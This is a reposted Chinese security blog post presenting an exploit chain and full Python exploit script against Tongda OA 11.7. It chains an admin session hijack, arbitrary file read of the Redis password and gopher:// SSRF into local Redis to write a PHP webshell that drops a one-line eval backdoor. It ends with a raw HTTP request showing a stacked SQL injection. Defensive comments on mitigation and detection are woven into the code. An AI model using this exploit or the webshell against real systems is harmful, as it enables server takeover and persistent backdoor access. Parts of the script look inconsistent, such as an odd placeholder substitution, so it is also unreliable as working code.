原文链接:通达OA11.7 利用新思路(附EXP)
前言
炒个冷饭。都是垃圾小洞组合在一起。
任意用户登陆+获取安装目录+任意文件读取+ssrf-->redis -->写入文件-->getshell
一、 通过任意用户登陆拿到管理员的cookie
二、获取安装目录读取redis 配置文件
三、 ssrf 写入文件
四、getshell
通过任意用户登陆拿到管理员的cookie
通达OA 任意用户登陆条件需要管理员在线
http://192.168.1.22/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0
访问该路径后会覆盖session,直接用cookie登陆,访问/general/目录即可进入后台。
这里已经登陆了。打开无痕模式
如果它什么都没有返回,说明是OK的,那么就利用当前的phpsessid进行访问。
如果出现RELOGIN,那说明管理员不在线。
漏洞形成的过程
这里查询了UID是否在线。CLIENT默认为0,这个0代表浏览器。
这个表存的是当前用户的登陆信息:UID和时间。sid是PHPSESSID的值,client是客户端标识符。
获取安装目录读取redis 配置文件
/general/approve_center/archive/getTableStruc.php
首先是任意文件读取
/ispirit/im/photo.php?AVATAR_FILE=D:/MYOA/bin/redis.windows.conf&UID=2
读取到redis 密码。然后通过ssrf
/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=gopher://127.0.0.1:6399/
完整exp
如下:
- # -*- coding:utf-8 -*-
- import os
- import requests
- import re
- # author :print("")
- import urllib
- class GenerateUrl:
- # Builds the Redis RESP command sequence that the SSRF step delivers over gopher://;
- # str(instance) returns it URL-encoded. Read as a defender: AUTH -> flushall ->
- # CONFIG SET dbfilename -> CONFIG SET dir -> SET -> save is the well-known
- # "Redis persists its dump into the webroot" pattern, and flushall wipes every key
- # in the instance as collateral damage.
- # Mitigation on the Redis side: requirepass plus rename-command for CONFIG, and a
- # dir that the web server cannot execute from; on the app side, accept only
- # http(s) targets in the SSRF sink. CONFIG SET dir/dbfilename in Redis logs or
- # MONITOR output is the detection point.
- def __init__(self, password, webroot, filename):
- # password: the requirepass value read from redis.windows.conf
- # webroot: directory Redis will be pointed at (dir); filename: dump name (dbfilename)
- self.password = password
- self.webroot = webroot
- self.filename = filename
- # Dropper body: the file Redis writes contains a PHP snippet that writes a second
- # file, 11.php, from a base64 blob (a one-line eval backdoor). Incident response
- # should therefore look for both 666.php and 11.php, not just the dropper.
- self.webshell = '''
-
- <?php file_put_contents('11.php',base64_decode('PD9waHAgQGV2YWwoJF9HRVRbMV0pPz4='))?>
- '''
- # RESP template with {placeholder} tokens; every $N is the byte length of the
- # following bulk string. NOTE(review): the leading '_' before '*2' is presumably
- # the gopher item-type byte that the client discards — confirm. The literal
- # "(unknown)" token is what line 90 below substitutes the filename into; it looks
- # like an extraction artefact for a {filename} placeholder — confirm.
- self.template = '''_*2
- $4
- AUTH
- ${password_len}
- {password}
- *1
- $8
- flushall
- *4
- $6
- CONFIG
- $3
- SET
- $10
- dbfilename
- ${filename_len}
- (unknown)
- *4
- $6
- CONFIG
- $3
- SET
- $3
- dir
- ${webroot_len}
- {webroot}
- *3
- $3
- SET
- $1
- 1
- ${content_len}
- {content}
- *1
- $4
- save
- *1
- $4
- quit
- '''
- def __str__(self):
- # Fills the template in place and returns it URL-encoded. Because it mutates
- # self.template, calling str() twice on the same instance does not give the same
- # (or a valid) result.
- webshell = self.webshell
- # Percent-encode the PHP body once; the whole template is encoded again below,
- # so the payload is double-encoded on the wire.
- webshell = webshell.replace('"', '%22').replace("'", '%27').replace(",", "%2c")
- webshell = webshell.replace(' ', '%20').replace('\n', '%0D%0A').replace('<', '%3c').replace('?', '%3f').replace(
- '>', '%3e')
- self.template = self.template.replace("{password_len}", str(len(self.password)))
- self.template = self.template.replace("{password}", self.password)
- self.template = self.template.replace("{filename_len}", str(len(self.filename)))
- self.template = self.template.replace("(unknown)", self.filename)
- self.template = self.template.replace("{webroot_len}", str(len(self.webroot)))
- self.template = self.template.replace("{webroot}", self.webroot)
- # Length is taken from the raw (unencoded) body, which is what Redis will see.
- self.template = self.template.replace("{content_len}", str(len(self.webshell)))
- self.template = self.template.replace("{content}", webshell)
- self.template = self.template.replace('\n', '%0D%0A')
- # NOTE: urllib.quote_plus is the Python 2 location of this function.
- return urllib.quote_plus(self.template)
- # Every request in get_path/ssrf_webshell is routed through a local intercepting
- # proxy on 127.0.0.1:8080; if nothing listens there, requests raises and the bare
- # excepts below report a misleading reason.
- proxies = {
- "http": "http://127.0.0.1:8080",
- "https": "http://127.0.0.1:8080",
- }
- def headers(phpsesion):
- # Request headers for the authenticated steps: a fixed User-Agent and a Cookie
- # header whose value is phpsesion verbatim (the value get_cookie returns).
- # The fixed, dated User-Agent string is a usable log signature for this script.
- # At runtime __main__ rebinds the module-level name `headers` to the returned dict.
- return {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1.6) ",
- "Cookie": phpsesion
- }
- # 获取绝对目录
- def get_path(url, headers):
- # Recovers the install root and the Redis password with two information
- # disclosures: getTableStruc.php returns JSON whose logPath is cut at the first
- # backslash (assumes that prefix is the install root — not verifiable from here),
- # then photo.php is asked for <root>/bin/redis.windows.conf and the
- # 'requirepass ...' line is regex-extracted.
- # Returns {"path": <root>, "redis_pass": <password>}; exits on any failure.
- # Detection: AVATAR_FILE carrying an absolute path, and any response body that
- # contains a Redis configuration, are strong indicators of this step.
- urlc = url
- url = (url + '/general/approve_center/archive/getTableStruc.php')
- try:
- data = requests.get(url=url, headers=headers, proxies=proxies).json()
- path = data['logPath'].split('\\')[0]
- url2 = urlc + '/ispirit/im/photo.php?AVATAR_FILE=%s/bin/redis.windows.conf&UID=2' % path
- data2 = requests.get(url=url2, headers=headers, proxies=proxies)
- ress = re.search('requirepass .+', data2.text).group()
- return {"path": path, "redis_pass": ress.replace('requirepass ', '').strip()}
- except:
- # Bare except: JSON errors, a missing logPath key, a None regex match and
- # proxy/connection failures all end here under one unrelated message.
- exit('ERROR Cookie PHPSESSID expired')
- # ssrf写入文件
- def ssrf_webshell(url, path, password):
- # SSRF sink: img_download.php fetches ATTACHMENTS server-side, so a gopher://
- # URL to 127.0.0.1:6399 hands the GenerateUrl payload to the local Redis, which
- # then persists 666.php under <path>/webroot/. Success is judged only by an
- # HTTP 200 on that file, so a catch-all page would be reported as a shell.
- # `headers` here is the module-level name (rebound to a dict by __main__);
- # `data` is assigned but never read. Always returns True.
- # Mitigation: allow only http(s) schemes in ATTACHMENTS and block loopback and
- # internal destinations; alert on "gopher://" in request logs, on Redis
- # CONFIG SET dir/dbfilename, and on new .php files appearing in the webroot.
- urlc = url
- path = path
- password = password
- a = GenerateUrl(password, path + "/webroot/", "666.php")
- url = url + '/pda/workflow/img_download.php?PLATFORM=dd&ATTACHMENTS=%s' % ('gopher://127.0.0.1:6399/' + str(a))
- data = requests.get(url=url, headers=headers, proxies=proxies)
- ddd = requests.get(url=urlc + '/666.php')
- if ddd.status_code == 200:
- print('shell url:%s' % urlc + '/666.php')
- else:
- print('send shell ERROR')
- return True
- def get_cookie(url):
- # Authentication bypass step: an unauthenticated GET to auth_mobi.php with
- # isAvatar=1&uid=1 yields a session for uid 1 (the admin, per the writeup), but
- # only while that user is online — "RELOGIN" in the body means offline.
- # Returns the SESSIONID cookie value; calls exit() on the failure branches and
- # falls through returning None on the "unknown error" branch. The broad except
- # hides the real cause (including a missing SESSIONID key).
- # Detection: unauthenticated requests to /mobile/auth_mobi.php carrying uid= and
- # isAvatar=1 are the signature of this step; the patched build should no longer
- # issue a session for them.
- url = url+ "/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0"
- headers = {
- "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
- }
- try:
- response = requests.get(url=url, headers=headers)
- if "RELOGIN" in response.text and response.status_code == 200:
- exit("目标用户为离线状态")
- elif response.status_code == 200 and response.text == "":
- print("好了马上就能getshell了")
- cookies = response.cookies
- cookie = requests.utils.dict_from_cookiejar(cookies)
- # A missing SESSIONID raises KeyError here rather than reaching the else.
- if cookie['SESSIONID']:
- return cookie['SESSIONID']
- else:
- exit('实在抱歉,getshell不了')
- else:
- print("未知错误,目标可能不存在或不存在该漏洞")
- except Exception as e:
- exit('实在抱歉,getshell不了')
- if __name__ == '__main__':
- # Entry point: runs the four steps in order. The bare except prints the usage
- # line for any failure, not only for a missing argv[1]. Note that `headers` is
- # rebound here from the function to the dict it returns; ssrf_webshell reads
- # that global.
- import sys
- try:
- url = sys.argv[1]
- cookie =get_cookie(url)
- headers = headers(cookie)
- root_path = get_path(url, headers)
- ssrf_webshell(url, root_path['path'], root_path['redis_pass'])
- except:
- print('python tongda.py http://127.0.0.1')
获取cookie那个地方没有测试,如果测试中出现意外需要改一改。纯演示思路。
分享一个后台SQL注入的点,这里支持堆叠注入。首先需要获取到通达OA的安装目录,然后into写入shell即可。=。=
- POST /general/appbuilder/web/officeproduct/productapply/applyprobygroup HTTP/1.1
- Host:
- 10.211.55.5
- Content-Length: 39
- Accept: */*
- DNT: 1
- X-Requested-With: XMLHttpRequest
- UserAgent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.103 Safar
- i/537.36
- Content-Type: application/x-www-form-urlencoded; charset=UTF-8
- Origin:
- http://10.211.55.5
- Referer:
- http://10.211.55.5/general/officeProduct/product_apply/index.php
- Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
- Cookie: SID_12=530bf0a5; SID_27=7202df24; USER_NAME_COOKIE=admin; OA_USER_ID=admin; PHPSESSID=1plu8qbupnesf40l9d02fdlvm5
- ; SID_1=24205621
- Connection: close
- arr[5][pro_id]=151';select sleep(3) %23